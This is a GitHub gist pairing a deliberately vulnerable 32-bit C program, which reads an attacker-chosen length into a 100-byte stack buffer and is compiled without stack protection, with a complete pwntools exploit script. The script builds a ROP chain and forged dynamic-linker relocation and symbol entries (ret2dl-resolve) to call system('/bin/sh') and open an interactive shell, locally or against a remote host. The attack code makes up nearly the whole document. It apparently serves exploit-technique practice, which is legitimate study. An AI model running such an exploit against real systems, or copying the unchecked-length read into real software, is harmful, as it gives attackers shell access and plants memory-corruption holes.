Created
April 5, 2016 00:19
-
-
Save icchy/08b2d23666ab1ecd5e723a56c9c6045d to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| gcc -m32 -fno-stack-protector $@ | |
| */ | |
| #include <unistd.h> | |
| int main() | |
| { | |
| char buf[100]; | |
| int size; | |
| read(0, &size, 4); | |
| read(0, buf, size); | |
| write(1, buf, size); | |
| return 0; | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context(os='linux', arch='i386') | |
| # context.log_level = 'debug' # output verbose log | |
| RHOST = "0" | |
| RPORT = 54321 | |
| LHOST = "127.0.0.1" | |
| LPORT = 54321 | |
| conn = None | |
| if len(sys.argv) > 1 and sys.argv[1] == 'r': | |
| conn = remote(RHOST, RPORT) | |
| elif len(sys.argv) > 1 and sys.argv[1] == 'l': | |
| conn = remote(LHOST, LPORT) | |
| else: | |
| conn = process(['./bof']) | |
| # conn = process(['./bof'], env={'LD_PRELOAD': ''}) | |
| # libc = ELF('') | |
| elf = ELF('./bof') | |
| def get_section_addr(name, elf=elf): | |
| return elf.get_section_by_name(name).header['sh_addr'] | |
| # preparing for exploitation | |
| bufsize = 100 | |
| addr_dynsym = get_section_addr('.dynsym') | |
| addr_dynstr = get_section_addr('.dynstr') | |
| addr_relplt = get_section_addr('.rel.plt') | |
| addr_plt = get_section_addr('.plt') | |
| addr_bss = get_section_addr('.bss') | |
| addr_plt_read = elf.plt['read'] | |
| addr_got_read = elf.got['read'] | |
| addr_pop3 = 0x0804851d | |
| addr_pop_ebp = 0x0804851f | |
| addr_leave_ret = 0x080483b8 | |
| stack_size = 0x800 | |
| base_stage = addr_bss + stack_size | |
| addr_reloc = base_stage + 20 | |
| addr_sym = addr_reloc + 8 | |
| align_dynsym = 0x10 - ((addr_sym - addr_dynsym) & 0xf) | |
| addr_sym += align_dynsym | |
| addr_symstr = addr_sym + 16 | |
| addr_cmd = addr_symstr + 7 | |
| reloc_ofs = addr_reloc - addr_relplt | |
| r_info = ((addr_sym - addr_dynsym) << 4) & ~0xff | 0x7 | |
| st_name = addr_symstr - addr_dynstr | |
| log.info('Pwning') | |
| buf1 = 'A' * bufsize | |
| buf1 += 'AAAA' * 3 | |
| buf1 += pack(addr_plt_read) + pack(addr_pop3) + pack(0) + pack(base_stage) + pack(100) | |
| buf1 += pack(addr_pop_ebp) + pack(base_stage) + pack(addr_leave_ret) | |
| buf2 = 'AAAA' | |
| buf2 += pack(addr_plt) | |
| buf2 += pack(reloc_ofs) + 'AAAA' + pack(addr_cmd) | |
| buf2 += pack(addr_got_read) | |
| buf2 += pack(r_info) | |
| buf2 += 'A' * align_dynsym | |
| buf2 += pack(st_name) | |
| buf2 += pack(0) | |
| buf2 += pack(0) | |
| buf2 += pack(0x12) | |
| buf2 += 'system\x00' | |
| buf2 += '/bin/sh\x00' | |
| buf2 += 'A' * (100-len(buf2)) | |
| conn.send(pack(len(buf1))) | |
| conn.send(buf1) | |
| log.info('read: %r' % conn.read(len(buf1))) | |
| conn.send(buf2) | |
| conn.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment